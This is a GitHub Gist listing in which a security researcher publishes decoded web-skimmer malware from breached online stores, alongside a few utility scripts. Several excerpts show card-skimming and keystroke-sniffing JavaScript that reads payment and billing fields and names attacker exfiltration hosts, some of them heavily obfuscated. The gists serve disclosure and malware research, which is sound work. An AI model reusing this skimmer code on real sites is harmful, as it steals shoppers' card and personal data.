Willem de Groot gwillem

gwillem / decoded.js
Created Oct 25, 2019
Procter & Gamble's FirstAidBeauty.com skimmed since May 5th 2019.
+ function () {
var a = ["digiNum", "input[name='payment[cc_number]']", "digiMon", "select[name='payment[cc_exp_month]']", "digiYea", "select[name='payment[cc_exp_year]']", "digiCbb", "input[name='payment[cc_cid]']", "digiNam", "input[name='payment[cc_owner]']", "clNameChecked", "l8", "shElement", "#payment-buttons-container", "hasClass", "click", "val", "change", "addClass", "#billing\:firstname", " ", "#billing\:lastname", "#billing\:company", "#billing\:street1", "#billing\:street2", "#billing\:email", "#billing\:telephone", "#billing\:city", "#billing\:region_id", "#billing\:country_id", "#billing\:postcode", "host", "location", "", "replace", "/", "userAgent", "stringify", "https://cdn.hsadspixel.com/t/", "main", "guid", "refer", "POST", "ajax", "random", "round", "fromCharCode", "key", "getElementById", "iv", "push", "length", "charCodeAt", "rotate", "sbox", "Rcon", "numberOfRounds", "core", "SIZE_256", "keySize", "rsbox", "shiftRow", "mixColumn", "galois_multiplication", "subBytes", "shiftRows", "m
View Volusion code
/*!
* JavaScript Cookie v2.2.1
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;
(function(factory) {
var registeredInModuleLoader;
View jsonline2csv.py
#!/usr/bin/env python3
# jsonline to csv converter for Andy
import csv
import json
import sys
if len(sys.argv) < 2:
print("Use {} <file.jsonline>".format(sys.argv[0]))
gwillem / decoded.js
Last active Aug 29, 2019
962 stores found breached on the 4th of July - https://sansec.io
// Decoded by Sanguine Security <info@sansec.io>
/**
 * Hex-encodes the string it is called on.
 *
 * Each UTF-16 code unit is written as four lowercase hexadecimal digits,
 * left-padded with zeros, so the result is always four times as long as the
 * input (for example "ab" becomes "00610062").
 *
 * The method is installed on String.prototype, so every string in the page
 * gains it once this script has run. `hexEncode` is not a standard String
 * method, so finding it on the prototype at runtime points at a script
 * that added it.
 *
 * @returns {string} the concatenated hex digits; '' for an empty string
 */
String.prototype.hexEncode = function() {
    var encoded = '';
    var position = 0;
    while (position < this.length) {
        var unitHex = this.charCodeAt(position).toString(16);
        // Pad to a fixed width of four digits so code units stay separable.
        encoded += ('000' + unitHex).slice(-4);
        position += 1;
    }
    return encoded;
};
gwillem / keystroke_sniffer_1.js
Last active Sep 21, 2019
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
// State object shared by the decoded sniffer's functions.
//   Gate    - URL string; presumably the endpoint captured data is sent to
//             (the sending code is outside this excerpt)
//   Data    - field values keyed by form-field id, written by SaveParam
//   Sent    - starts as an empty array; its use is not visible here
//   IsValid - starts false (the decoded source spelled it `![]`); SaveParam
//             sets it to true once a field value passes its two checks
var sniffData = {
    Gate: 'https://font-assets.com/img',
    Data: {},
    Sent: [],
    IsValid: false
};
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.id] = field.value;
return;
View original.js
var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x
View skimmer.js
var _0xBCEC = ["68$61$77$6b$73$73$68$6f$70$2e$63$6f$6d", "2f$63$68$65$63$6b$6f$75$74", "", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69", "6d$61$67$65$32$5f$64$65$66$61$75$6c$74", "length", "wtf", "prototype", "$", "split", "reduce", "fromCharCode", "map", "replace", "toString", "rot13", "Z", "charCodeAt", "rot5", "join", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "_utf8_encode", "charAt", "_keyStr", "indexOf", "_utf8_decode", "\n", "isUndefined", "isNull", "href", "location", "div", "createElement", "i", "getElementsByTagName", "innerHTML", "<!--[if gt IE ", "]><i></i><![endif]-->", "childNodes", "nodeType", "push", "getAttribute", "attributes", "nodeName", "nodeValue", "textContent", "innerText", "getComputedStyle", "display", "no
gwillem / main.py
Last active Apr 23, 2019
dfurniturestore.co.uk MacOS X botnet code -- found on https://dfurniturestore.co.uk/js/Update 04-19.dmg
import os
import pwd
import random
import string
import urllib, urllib2
import json
import time
import sys
import base64
import random
gwillem / enforce-passwd-change.sh
Created Mar 4, 2019
Enforce new passwords for all Magento1 staff users
# Requires n98-magerun
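# Give every active Magento 1 admin user a fresh random password and print
# "user -> password" for each account whose password was actually changed.
#
# NOTE(review): the new passwords appear in clear text on stdout and are
# passed to n98-magerun as command-line arguments, where other local users
# can read them from the process list while the command runs. Run this on a
# trusted host and treat any captured output as a secret.
n98-magerun admin:user:list --format=csv | grep ,active | while IFS= read -r row;
do
    # Field 2 of each CSV row is used as the account name.
    user=$(printf '%s\n' "$row" | cut -d, -f2)
    # Ten alphanumeric characters drawn from /dev/urandom. LC_ALL=C makes tr
    # treat the input as raw bytes instead of failing in a multibyte locale.
    pass=$(LC_ALL=C tr -cd '[:alnum:]' < /dev/urandom | fold -w10 | head -n1)
    # stdin is redirected so the command cannot consume the remaining rows
    # that the loop is still reading from the pipe.
    if n98-magerun admin:user:change-password "$user" "$pass" >/dev/null </dev/null; then
        echo "$user -> $pass"
    else
        # Report the failure rather than printing a password that was never set.
        echo "password change failed for $user" >&2
    fi
done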
gwillem / onlineclouds.cloud_conversion_async_unfuscated.js
Created Nov 19, 2018
Malware from onlineclouds.cloud unfuscated
// `snd` starts out null; whatever assigns or reads it is outside this excerpt.
var snd = null;
// Schedule a single call to checkForCheckout about 100 ms after this script
// is evaluated. Nothing visible here re-arms the timer.
setTimeout(checkForCheckout, 100);
/**
 * Calls scrapeAllFields() when the current page address looks like a
 * checkout page.
 *
 * window.location is converted to its string form by RegExp.prototype.test,
 * so the pattern is matched against the whole URL. The match is an
 * unanchored, case-sensitive substring test: any one of the listed
 * fragments anywhere in the address (host, path or query) is enough.
 *
 * @returns {undefined}
 */
function checkForCheckout() {
    var checkoutPattern = /onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/;
    if (!checkoutPattern.test(window.location)) {
        return;
    }
    scrapeAllFields();
}
function createQueryString() {